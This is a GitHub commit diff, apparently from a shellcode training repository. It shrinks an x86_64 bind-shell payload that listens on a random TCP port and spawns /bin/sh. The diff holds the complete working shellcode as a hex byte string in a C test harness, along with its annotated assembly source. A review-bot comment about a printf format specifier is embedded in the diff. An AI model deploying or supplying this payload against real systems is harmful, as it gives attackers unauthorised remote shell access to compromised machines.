
oh my god, smaller?
Let's use smarter xchg and trust in the push pop.

Signed-off-by: Geyslan G. Bem <[email protected]>
geyslan committed Jan 29, 2021
1 parent 0493db8 commit e12bbf4
Showing 2 changed files with 12 additions and 15 deletions.
14 changes: 7 additions & 7 deletions improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c
Expand Up @@ -28,7 +28,7 @@
assembly source:
https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm
* 53 bytes
* 52 bytes
* null-free
Expand All @@ -53,12 +53,12 @@ int main(void)
{
const char code[] =

"\x6a\x29\x58\x99\x52\x5e\xff\xc6\x6a\x02"
"\x5f\x0f\x05\x52\x5e\x97\xb0\x32\x0f\x05"
"\xb0\x2b\x0f\x05\x57\x5e\x97\xff\xce\xb0"
"\x21\x0f\x05\x75\xf8\x52\x48\xbf\x2f\x2f"
"\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\xb0"
"\x3b\x0f\x05";
"\x6a\x29\x58\x99\x6a\x01\x5e\x6a\x02\x5f"
"\x0f\x05\x52\x5e\x97\xb0\x32\x0f\x05\xb0"
"\x2b\x0f\x05\x97\x96\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf7\x52\x48\xbf\x2f\x2f\x62"
"\x69\x6e\x2f\x73\x68\x57\x54\x5f\xb0\x3b"
"\x0f\x05";

// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %ld\n", strlen(code));
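Review bot: The unchanged context line `printf("Shellcode Length: %ld\n", strlen(code));` in the second hunk passes a `size_t` to a `%ld` conversion, which is a format/argument type mismatch (undefined behavior per the C standard and a width mismatch on 32-bit ABIs); `-Wformat` flags it. Since the commit already touches this hunk, it would be cheap to correct the specifier to `printf("Shellcode Length: %zu\n", strlen(code));`. The body of main() continues past the end of the hunk.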
13 changes: 5 additions & 8 deletions improvements/tiny_shell_bind_tcp_random_port_x86_64.asm
Expand Up @@ -37,12 +37,12 @@

; tiny_shell_bind_tcp_random_port_x86_64
;
; * 54 bytes
; * 52 bytes
; * null-free
;
;
; # nasm -f elf64 tiny_shell_bind_tcp_random_port_x86_64.asm
; # ld -m elf_x86_64 tiny_shell_bind_tcp_random_port_x86_64.o -o \
; # nasm -f elf64 tiny_shell_bind_tcp_random_port_x86_64.asm; \
; ld -m elf_x86_64 tiny_shell_bind_tcp_random_port_x86_64.o -o \
; tiny_shell_bind_tcp_random_port_x86_64
;
; Testing
Expand Down Expand Up @@ -78,9 +78,8 @@ _start:
; Zeroing rdx, search about cdq instruction for understanding
cdq ; IPPROTO_IP = 0 (int) - rdx

push rdx
push 1 ; SOCK_STREAM = 1 (int)
pop rsi
inc esi ; SOCK_STREAM = 1 (int)

push 2 ; AF_INET = 2 (int)
pop rdi
Expand Down Expand Up @@ -118,10 +117,8 @@ _start:
; int dup2(int oldfd, int newfd);
; dup2(clientfd, ...)

push rdi ; push the sockfd integer to use as the loop counter (rsi)
pop rsi
xchg edi, eax ; put the clientfd returned from accept into rdi
xchg esi, eax ; put the sockfd integer into rsi to use as the loop counter

dup_loop:
dec esi ; decrement loop counter
